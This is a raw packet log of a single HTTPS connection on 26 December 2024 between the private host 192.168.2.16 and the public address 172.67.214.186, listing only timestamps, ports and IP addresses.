Dec 26, 2024 18:26:44.803555965 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.803611040 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.803616047 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.855700970 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.965152979 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.965166092 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.965188980 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.965226889 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.965233088 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.965255976 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.965281010 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.972636938 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.972659111 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.972693920 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.972698927 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.972728014 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.972738981 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.979195118 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.979218006 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.979250908 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.979255915 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.979284048 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.979302883 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.986638069 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.986658096 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.986712933 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.986717939 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.986763954 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.994227886 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.994249105 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.994283915 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.994288921 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.994321108 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.994328022 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.002055883 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.002079010 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.002115965 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.002120972 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.002151966 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.002162933 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.004376888 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.004430056 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.011693001 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.011722088 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.011751890 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.011755943 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.011786938 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.018591881 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.018616915 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.018647909 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.018655062 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.018696070 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.062676907 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.177182913 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.177206993 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.177263021 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.177269936 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.177316904 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.184724092 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.184745073 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.184787989 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.184793949 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.184822083 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.184839010 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.192047119 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.192069054 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.192110062 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.192116022 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.192145109 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.192169905 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.199594975 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.199618101 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.199707031 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.199712038 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.199755907 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.206525087 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.206543922 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.206594944 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.206599951 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.206648111 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.213022947 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.213043928 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.213094950 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.213099957 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.213145018 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.220520020 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.220540047 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.220582962 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.220588923 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.220619917 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.220633984 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.227925062 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.227945089 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.227983952 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.227988958 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.228014946 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.228037119 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.229558945 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.241731882 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.388093948 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.388120890 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.388161898 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.388171911 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.388197899 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.388217926 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.395484924 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.395504951 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.395541906 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.395546913 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.395569086 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.395593882 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.403017998 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.403039932 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.403070927 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.403074980 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.403098106 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.403122902 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.409454107 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.409473896 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.409527063 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.409532070 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.409568071 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.411472082 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.417125940 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.417145967 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.417186975 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.417191982 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.417217970 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.417241096 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.418991089 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.419042110 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.425518036 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.425539017 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.425575972 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.425580025 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.425606966 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.432687044 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.432713985 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.432751894 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.432756901 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.432785034 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.478686094 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.593492031 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.593513012 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.593555927 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.593560934 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.593600035 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.600152969 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.600172997 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.600208044 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.600213051 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.600239992 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.600266933 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.607491970 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.607512951 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.607553005 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.607558012 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.607592106 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.607604980 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.614877939 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.614898920 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.614940882 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.614945889 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.614969969 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.614979029 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.621486902 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.621507883 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.621557951 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.621562958 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.621623039 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.629313946 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.629339933 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.629378080 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.629383087 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.629406929 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.629429102 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.635862112 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.635881901 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.635921001 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.635927916 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.635968924 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.635968924 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.643408060 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.643429041 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.643471956 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.643476963 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.643502951 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.643526077 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.804079056 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.804100037 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.804140091 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.804146051 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.804188967 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.812855959 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.812875032 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.812916040 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.812920094 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.812947035 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.812968969 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.820120096 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.820138931 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.820193052 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.820198059 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.820249081 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.827164888 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.827184916 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.827235937 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.827241898 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.827289104 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.834181070 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.834225893 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.834265947 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.834270954 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.834309101 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.834321976 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.840728998 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.840756893 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.840787888 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.840791941 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.840820074 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.840836048 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.847882986 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.847906113 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.847943068 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.847948074 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.848010063 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.854651928 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.854675055 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.854727030 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:45.854732990 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:45.854778051 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.014487982 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.014511108 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.014552116 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.014560938 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.014591932 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.014609098 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.021377087 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.021405935 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.021454096 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.021460056 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.021492958 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.021513939 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.028772116 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.028791904 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.028856993 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.028862953 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.028912067 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.036236048 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.036257029 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.036294937 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.036298990 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.036328077 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.036348104 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.042754889 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.042787075 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.042828083 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.042833090 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.042859077 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.042880058 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.050741911 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.050762892 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.050811052 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.050817013 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.050849915 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.050870895 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.057282925 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.057302952 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.057336092 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.057343006 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.057369947 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.057390928 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.060156107 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.065820932 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.065841913 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.065887928 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.065892935 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.065918922 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.065937996 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.104435921 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.225142956 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.225167036 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.225219965 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.225225925 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.225281000 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.232673883 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.232695103 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.232747078 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.232750893 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.232789993 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.232820034 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.239208937 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.239228964 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.239281893 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.239286900 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.239342928 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.239342928 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.246587038 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.246618986 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.246682882 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.246689081 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.246725082 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.246745110 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.254218102 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.254236937 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.254283905 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.254287958 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.254328966 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.261159897 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.261179924 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.261262894 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.261267900 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.261315107 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.268516064 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.268536091 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.268615007 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.268620968 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.268683910 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.276228905 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.276251078 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.276297092 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.276303053 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.276330948 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.276351929 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.435714960 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.435739040 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.435817957 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.435832977 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.435883045 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.443017006 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.443063021 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.443124056 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.443130016 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.443172932 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.450480938 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.450500965 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.450561047 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.450565100 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:46.450611115 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:46.457034111 CET	443	49719	172.67.214.186	192.168.2.16
